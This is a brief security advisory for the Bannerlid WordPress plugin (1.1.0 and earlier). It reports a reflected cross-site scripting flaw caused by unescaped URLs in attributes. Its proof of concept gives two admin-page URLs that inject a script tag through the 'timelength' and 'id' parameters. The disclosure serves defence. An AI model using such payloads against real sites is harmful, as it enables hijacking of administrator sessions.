Bannerlid <= 1.1.0 - Reflected XSS

Description The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators

PoC

Have an admin open URLs: - https://example.com/wp-admin/admin.php?page=bannerlid-zones&amp;subpage;=Overview&amp;id;=1&amp;timelength;="><script>alert(1)<%2Fscript> - https://example.com/wp-admin/admin.php?page=bannerlid-zones&amp;subpage;=edit_zone&amp;id;="><script>alert(1)<%2Fscript>